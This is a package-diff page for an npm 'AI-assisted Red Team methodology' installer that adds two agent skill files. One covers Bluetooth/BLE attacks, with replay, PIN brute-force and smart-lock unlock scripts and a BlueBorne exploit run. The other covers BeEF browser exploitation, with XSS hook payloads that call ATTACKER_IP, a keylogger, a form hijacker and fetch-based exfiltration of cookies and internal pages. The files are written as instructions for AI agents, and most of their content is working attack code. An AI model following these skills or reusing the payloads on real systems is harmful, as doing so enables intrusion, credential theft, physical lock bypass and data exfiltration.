npm - rtexit-method - Versions diffs - 0.1.6 → 0.1.7 - Mend

rtexit-method 0.1.6 → 0.1.7

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (6) hide show

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "rtexit-method",
-  "version": "0.1.6",
+  "version": "0.1.7",
   "description": "RTExit - AI-assisted Red Team methodology installer",
   "license": "MIT",
   "author": "Exit Code",

package/packaged-assets/.agents/skills/rt-bluetooth-ble/SKILL.md ADDED Viewed

@@ -0,0 +1,302 @@
+---
+name: rt-bluetooth-ble
+description: "Bluetooth and BLE (Bluetooth Low Energy) attack skill for authorized engagements. BLE device scanning and enumeration, GATT service/characteristic discovery, BLE sniffing with Ubertooth, pairing bypass and MITM, smart lock exploitation, BLE replay attacks, Bluetooth Classic attacks (BlueBorne, KNOB, BIAS), Flipper Zero BLE operations, and medical/IoT device BLE testing. Use when engagement scope includes BLE-enabled devices, smart locks, medical devices, or IoT infrastructure."
+---
+# rt-bluetooth-ble — Bluetooth & BLE Exploitation
+## Overview
+BLE (Bluetooth Low Energy) is everywhere — smart locks, access badges, medical devices, industrial sensors, asset trackers, and IoT controllers. Many implementations have weak or no authentication, cleartext data transmission, and replay vulnerabilities. Bluetooth Classic has several critical protocol-level vulnerabilities.
+**Required hardware:** Bluetooth adapter (hci0), Ubertooth One (sniffing), Flipper Zero (all-in-one), nRF52840 dongle.
+---
+## Phase 1 — BLE Discovery & Scanning
+```bash
+# Install tools
+apt install bluetooth bluez bluez-tools -y
+pip3 install bleak gattacker
+# Basic BLE scan
+hciconfig hci0 up
+hcitool lescan
+# Output:
+# AA:BB:CC:DD:EE:FF  Smart Lock Pro
+# 11:22:33:44:55:66  (unknown)
+# Advanced scan with more detail
+bluetoothctl
+  scan on
+  devices  # List discovered devices
+  info AA:BB:CC:DD:EE:FF  # Detailed device info
+  scan off
+# blescan — enumerate GATT services
+python3 -m bleak.cli.scan  # Quick Python BLE scan
+# Active scan (get more advertising data)
+sudo btmgmt --index 0 le-on
+sudo btmgmt --index 0 find -l  # Low energy scan with advertising data
+```
+---
+## Phase 2 — GATT Service Enumeration
+```bash
+# GATT = Generic Attribute Profile — BLE data structure
+# Services → Characteristics → Values
+# Characteristics have: UUID, properties (read/write/notify), value
+# gatttool — enumerate GATT
+gatttool -b AA:BB:CC:DD:EE:FF -I
+  connect
+  primary  # List all services
+  characteristics  # List all characteristics
+  char-read-hnd 0x0010  # Read characteristic at handle 0x10
+# Python bleak — programmatic GATT enumeration
+python3 << 'EOF'
+import asyncio
+from bleak import BleakClient
+TARGET_MAC = "AA:BB:CC:DD:EE:FF"
+async def enumerate_gatt():
+    async with BleakClient(TARGET_MAC) as client:
+        print(f"Connected: {client.is_connected}")
+        for service in client.services:
+            print(f"\nService: {service.uuid} — {service.description}")
+            for char in service.characteristics:
+                print(f"  Char: {char.uuid}")
+                print(f"  Properties: {char.properties}")
+                # Try to read each characteristic
+                if "read" in char.properties:
+                    try:
+                        val = await client.read_gatt_char(char.uuid)
+                        print(f"  Value: {val.hex()} | ASCII: {val.decode('utf-8', errors='replace')}")
+                    except Exception as e:
+                        print(f"  Read error: {e}")
+asyncio.run(enumerate_gatt())
+EOF
+```
+---
+## Phase 3 — BLE Sniffing with Ubertooth
+```bash
+# Ubertooth One = dedicated BLE/Bluetooth sniffer hardware
+# Captures BLE advertising packets and connections
+# Install ubertooth
+apt install ubertooth -y
+# Sniff BLE advertising
+ubertooth-btle -f -c capture.pcap  # Follow connections, save to pcap
+wireshark capture.pcap  # Analyze BLE traffic in Wireshark
+# Follow a specific device connection
+ubertooth-btle -f -t AA:BB:CC:DD:EE:FF -c target.pcap
+# Crack BLE pairing (if legacy pairing / Just Works)
+ubertooth-btle -p -c pairing.pcap  # Capture pairing exchange
+crackle -i pairing.pcap -o decrypted.pcap  # Decrypt with crackle
+# crackle: github.com/mikeryan/crackle
+# Wireshark BLE display filters:
+# btle.advertising_header  → advertising packets
+# btle.data_header         → data packets
+# btle.advertising_address → filter by MAC
+```
+---
+## Phase 4 — BLE Authentication Bypass & Replay
+```bash
+# Many BLE devices use simple commands sent as characteristic writes
+# Smart lock: write 0x55AA → unlock
+# Replay attack: capture unlock command → replay it
+# Capture with Wireshark/Ubertooth → find write commands
+# Filter: btatt.opcode == 0x52 (Write Command) or btatt.opcode == 0x12 (Write Request)
+# Replay captured command
+python3 << 'EOF'
+import asyncio
+from bleak import BleakClient
+TARGET_MAC = "AA:BB:CC:DD:EE:FF"
+UNLOCK_CHAR_UUID = "0000xxxx-0000-1000-8000-00805f9b34fb"
+UNLOCK_PAYLOAD = bytes.fromhex("55AA0100")  # Captured from sniff
+async def replay_unlock():
+    async with BleakClient(TARGET_MAC) as client:
+        await client.write_gatt_char(UNLOCK_CHAR_UUID, UNLOCK_PAYLOAD)
+        print("Unlock command sent!")
+        # Read response
+        response = await client.read_gatt_char(UNLOCK_CHAR_UUID)
+        print(f"Response: {response.hex()}")
+asyncio.run(replay_unlock())
+EOF
+# Brute force PIN/passcode sent over BLE
+python3 << 'EOF'
+import asyncio
+from bleak import BleakClient
+TARGET_MAC = "AA:BB:CC:DD:EE:FF"
+CHAR_UUID = "CHARACTERISTIC_UUID"
+async def brute_force():
+    async with BleakClient(TARGET_MAC) as client:
+        for pin in range(0, 10000):
+            payload = pin.to_bytes(2, 'big')  # 2-byte PIN
+            try:
+                await client.write_gatt_char(CHAR_UUID, payload)
+                response = await client.read_gatt_char(CHAR_UUID)
+                if b'\x00\x01' in response:  # Success response
+                    print(f"VALID PIN: {pin:04d}")
+                    break
+            except: pass
+asyncio.run(brute_force())
+EOF
+```
+---
+## Phase 5 — BLE MITM Attack
+```bash
+# GATTacker — BLE MITM framework
+# https://github.com/securing/gattacker
+npm install -g gattacker
+# Step 1: Scan and clone target device profile
+node scan.js  # Discovers nearby BLE devices
+node scan.js -s AA:BB:CC:DD:EE:FF  # Clone specific device profile
+# Creates: devices/AA_BB_CC_DD_EE_FF.adv.json, .srv.json
+# Step 2: Impersonate target device (MITM)
+# Two adapters needed: one to connect to real device, one to advertise as fake
+node mitm.js AA_BB_CC_DD_EE_FF  # Start MITM
+# Real app → connects to fake device → GATTacker proxies to real device
+# All traffic logged → modify values in transit
+# Flipper Zero — BLE MITM (simpler)
+# Flipper → Bluetooth → BLE Tools → Scan
+# Select device → Clone → Advertise as device
+# Intercept communications between real device and mobile app
+```
+---
+## Phase 6 — Bluetooth Classic Attacks
+```bash
+# BlueBorne (CVE-2017-1000251) — unauthenticated RCE via Bluetooth
+# Affects: Linux kernel < 4.14, Android < 8.0, Windows Vista/7/8/10
+# Range: ~10 meters, no pairing required
+# Check target Bluetooth version
+hcitool info TARGET_MAC | grep "LMP Version"
+# LMP Version: 4.x = likely vulnerable
+# BlueBorne exploit (Linux target)
+git clone https://github.com/ojasookert/CVE-2017-1000250
+python3 exploit.py TARGET_MAC
+# KNOB Attack (CVE-2019-9506) — entropy negotiation
+# Force encryption key to 1 byte → brute force in milliseconds
+# Affects: all Bluetooth Classic implementations
+# Requires: hardware (Ubertooth or modified firmware)
+# BIAS Attack (CVE-2020-10135) — authentication bypass
+# Skip authentication in Bluetooth Secure Simple Pairing
+# Impersonate any previously-paired device
+# Bluebugging — take control of phone via AT commands
+# Older phones (pre-2004): connect → send AT commands → calls, SMS
+# Modern: mostly patched but some IoT/automotive still vulnerable
+# Bluejacking — unsolicited messages
+hcitool scan  # Find discoverable devices
+bt-obex -p TARGET_MAC message.txt  # Send file via OBEX
+# Bluesnarfing — unauthorized data access
+# Legacy attack on older devices
+obexftp -b TARGET_MAC -g telecom/pb.vcf  # Steal phonebook
+```
+---
+## Phase 7 — Smart Lock & IoT BLE Exploitation
+```bash
+# Smart lock common vulnerabilities:
+# 1. No authentication (anyone can send unlock command)
+# 2. Replay attack (fixed unlock code, not rotating)
+# 3. Cleartext PIN transmission
+# 4. Weak pairing (Just Works = no authentication)
+# 5. Firmware update over BLE without signature verification
+# Step-by-step smart lock assessment:
+# 1. Scan and enumerate GATT
+python3 enumerate_gatt.py TARGET_MAC > gatt_profile.txt
+# 2. Find lock/unlock characteristics
+grep -i "lock\|access\|command\|control" gatt_profile.txt
+# 3. Capture legitimate unlock operation
+ubertooth-btle -f -t TARGET_MAC -c unlock.pcap
+# Trigger unlock from legitimate app while Ubertooth captures
+# 4. Analyze captured traffic
+wireshark unlock.pcap
+# Filter: btatt.opcode == 0x52
+# Note: handle, UUID, and payload bytes
+# 5. Replay
+python3 replay.py TARGET_MAC CHAR_UUID UNLOCK_HEX
+# 6. Test PIN brute force
+python3 brute_force.py TARGET_MAC CHAR_UUID
+# Flipper Zero smart lock testing
+# Bluetooth → BLE Tools → Scan → Select Lock → Read GATT
+# Save profile → replay captured commands
+```
+---
+## Skill Levels
+**BEGINNER:** hcitool lescan + gatttool GATT enumeration + Flipper Zero for scanning and replay
+**INTERMEDIATE:** Bleak Python scripts for programmatic GATT access + replay attacks + PIN brute force
+**ADVANCED:** Ubertooth sniffing + crackle for pairing crack + GATTacker MITM
+**EXPERT:** Custom BLE firmware analysis + KNOB/BIAS attacks + medical device exploitation
+---
+## References
+- Bleak (Python BLE): https://github.com/hbldh/bleak
+- GATTacker: https://github.com/securing/gattacker
+- crackle: https://github.com/mikeryan/crackle
+- Ubertooth: https://github.com/greatscottgadgets/ubertooth
+- BlueBorne: https://www.armis.com/blueborne/
+- MITRE T1424: https://attack.mitre.org/techniques/T1424/

package/packaged-assets/.agents/skills/rt-browser-exploitation/SKILL.md ADDED Viewed

@@ -0,0 +1,244 @@
+---
+name: rt-browser-exploitation
+description: "Browser exploitation and BeEF framework skill for authorized engagements. BeEF (Browser Exploitation Framework) hooking via XSS, browser-based network pivoting to internal resources, keylogging and credential harvesting from browser, session token theft, browser fingerprinting for target profiling, JavaScript-based port scanning through victim browser, webcam/microphone access, and chaining XSS to full internal network access. Use when XSS is found and scope permits browser-based exploitation."
+---
+# rt-browser-exploitation — Browser Exploitation & BeEF
+## Overview
+A hooked browser is a foothold inside the victim's network. The BeEF (Browser Exploitation Framework) framework turns a reflected/stored XSS into a persistent command channel — running JavaScript in the victim's browser to pivot into internal networks, steal credentials, and fingerprint the environment. A browser on an internal network can reach internal services that the attacker cannot reach directly.
+---
+## Phase 1 — BeEF Setup
+```bash
+# Install BeEF
+apt install beef-xss -y
+# Or from source:
+git clone https://github.com/beefproject/beef && cd beef
+./install
+# Configure BeEF
+nano config.yaml
+# Change default credentials:
+# user: "beef"
+# passwd: "your_password"
+# Set permitted_hooks: '*' for testing, or restrict to target IP
+# Start BeEF
+./beef
+# Web UI: http://127.0.0.1:3000/ui/panel
+# Hook URL: http://YOUR_IP:3000/hook.js
+# Expose BeEF to internet (for external targets)
+# Option A: Cloudflare Tunnel
+cloudflared tunnel --url http://localhost:3000
+# Option B: ngrok
+ngrok http 3000
+# Option C: VPS reverse proxy (see rt-redteam-infra)
+```
+---
+## Phase 2 — Hooking Victims via XSS
+```javascript
+// Basic XSS payload — loads BeEF hook
+<script src="http://ATTACKER_IP:3000/hook.js"></script>
+// Attribute injection
+"><script src="http://ATTACKER_IP:3000/hook.js"></script>
+// DOM-based / filter bypass variants
+<img src=x onerror="var s=document.createElement('script');s.src='http://ATTACKER_IP:3000/hook.js';document.head.appendChild(s)">
+// Stored XSS (persists — re-hooks every visitor)
+// Best for: comment sections, profile names, product reviews
+// SVG-based (bypasses some filters)
+<svg onload="fetch('http://ATTACKER_IP:3000/hook.js').then(r=>r.text()).then(eval)">
+// CSP bypass via JSONP (if allowed domain has JSONP endpoint)
+<script src="https://allowed-cdn.com/jsonp?callback=eval&data=fetch('http://ATTACKER/hook.js').then(r=>r.text()).then(eval)"></script>
+// BeEF persistent hook — survives page navigation
+// In BeEF console: Hooked Browsers → select victim → Commands → Persistence → Man-In-The-Browser
+```
+---
+## Phase 3 — Internal Network Recon via Browser
+```javascript
+// Victim's browser is inside the corporate network
+// Use it to scan internal hosts — bypasses all perimeter controls
+// BeEF: Commands → Network Discovery → Get Internal IP
+// Returns: victim's internal IP address (via WebRTC)
+// Port scan internal hosts through victim's browser
+// BeEF: Commands → Network Discovery → Port Scanner
+// Set: network range 10.10.10.0/24, ports 22,80,443,8080,3389,5985
+// Manual JavaScript port scan
+(function() {
+    var targets = [];
+    for (var i = 1; i < 255; i++) targets.push('10.10.10.' + i);
+    var ports = [22, 80, 443, 8080, 3389, 5985, 27017, 3306, 5432];
+    targets.forEach(function(host) {
+        ports.forEach(function(port) {
+            var img = new Image();
+            var start = Date.now();
+            img.onload = img.onerror = function() {
+                var t = Date.now() - start;
+                if (t < 100) {  // Fast response = open port
+                    fetch('http://ATTACKER/collect?open=' + host + ':' + port);
+                }
+            };
+            img.src = 'http://' + host + ':' + port + '/favicon.ico?' + Math.random();
+        });
+    });
+})();
+```
+---
+## Phase 4 — Internal Service Access via Browser
+```javascript
+// Access internal web services through victim browser
+// Admin panels, dev tools, monitoring dashboards
+// BeEF: Commands → Network Discovery → Get HTTP Servers
+// Then: Commands → Browser → Redirect Browser → http://internal-jenkins:8080
+// Fetch internal resources and exfil
+fetch('http://192.168.1.1/admin/')
+    .then(r => r.text())
+    .then(html => fetch('http://ATTACKER/exfil?data=' + btoa(html)));
+// Access internal API
+fetch('http://10.10.10.5:8080/api/users', {
+    headers: {'Cookie': document.cookie}  // Victim's internal auth cookies
+})
+.then(r => r.json())
+.then(data => fetch('http://ATTACKER/collect', {
+    method: 'POST',
+    body: JSON.stringify(data)
+}));
+// Pivot to internal services requiring victim's browser auth
+// (Browser automatically sends cookies for internal domains)
+fetch('http://internal-sharepoint/sites/IT/_api/search/query?querytext=password')
+    .then(r => r.json())
+    .then(d => exfil(d));
+```
+---
+## Phase 5 — Credential Harvesting
+```javascript
+// Keylogger
+document.addEventListener('keydown', function(e) {
+    fetch('http://ATTACKER/keys?k=' + encodeURIComponent(e.key) +
+          '&url=' + encodeURIComponent(window.location.href));
+});
+// Form hijacking — capture all form submissions
+document.querySelectorAll('form').forEach(function(form) {
+    form.addEventListener('submit', function(e) {
+        var data = new FormData(form);
+        var params = [];
+        data.forEach(function(val, key) { params.push(key + '=' + val); });
+        fetch('http://ATTACKER/forms?data=' + encodeURIComponent(params.join('&')) +
+              '&url=' + encodeURIComponent(window.location.href));
+    });
+});
+// BeEF modules for credential theft:
+// Commands → Browser → Hooked Domain → Get Cookie (all cookies)
+// Commands → Browser → Hooked Domain → Get Page HTML
+// Commands → User Interface → Fake Notification Bar (phish credentials)
+// Commands → User Interface → Pretty Theft (overlay login form)
+```
+---
+## Phase 6 — BeEF Advanced Modules
+```bash
+# From BeEF web UI → select hooked browser → Commands tab
+# Fingerprinting
+# Browser → Detect Browser (version, plugins, extensions)
+# Browser → Get Browser Version
+# Network Discovery → Get Internal IP (WebRTC leak)
+# Browser → Detect Flash Version
+# Social Engineering
+# User Interface → Fake Login Form (overlays fake login)
+# User Interface → Fake Notification Bar (Chrome/Firefox extension install prompt)
+# User Interface → Alert Dialog (social engineering prompt)
+# Tunneling
+# Network Discovery → Ping Sweep (ICMP through browser)
+# Proxy → Create Proxy (HTTP proxy through victim browser)
+# Persistence
+# Misc → Create Shortcut (desktop shortcut that loads hook on click)
+# Persistence → Man-In-The-Browser (hooks all page navigations)
+# Persistence → Create Pop-Under (hidden window keeps hook alive)
+# Webcam / Microphone (requires HTTPS + user interaction on modern browsers)
+# Misc → Webcam
+# Requires: HTTPS + victim granted permission
+```
+---
+## Phase 7 — XSS to Full Internal Compromise Chain
+```
+FULL ATTACK CHAIN:
+1. Find stored XSS on internet-facing app (e.g., user profile, comment)
+2. Inject BeEF hook: <script src="https://ATTACKER/hook.js"></script>
+3. Wait for admin/internal user to trigger XSS
+4. BeEF hooks admin browser
+5. Internal network scan → find internal Jenkins at 10.10.10.15:8080
+6. Redirect admin browser to Jenkins admin panel
+7. Use admin's browser cookies → access Jenkins as admin
+8. Create Jenkins pipeline → execute OS commands
+9. Reverse shell to attacker C2
+10. Now inside internal network
+OR:
+4. Steal admin session cookie via BeEF
+5. Use cookie in Burp → access admin panel directly
+6. Escalate from admin panel → RCE
+```
+---
+## Skill Levels
+**BEGINNER:** BeEF setup + basic XSS hook + steal cookies + redirect browser
+**INTERMEDIATE:** Internal network scan via victim browser + internal service access + credential keylogging
+**ADVANCED:** CSP bypass for hook injection + Man-in-the-Browser persistence + internal pivot via browser
+**EXPERT:** Full XSS → internal network → RCE chain + custom BeEF modules + browser-based C2
+---
+## References
+- BeEF: https://github.com/beefproject/beef
+- BeEF Wiki: https://github.com/beefproject/beef/wiki
+- XSS to RCE via BeEF: https://www.hackingarticles.in/comprehensive-guide-to-beef-xss-framework/
+- MITRE T1185: https://attack.mitre.org/techniques/T1185/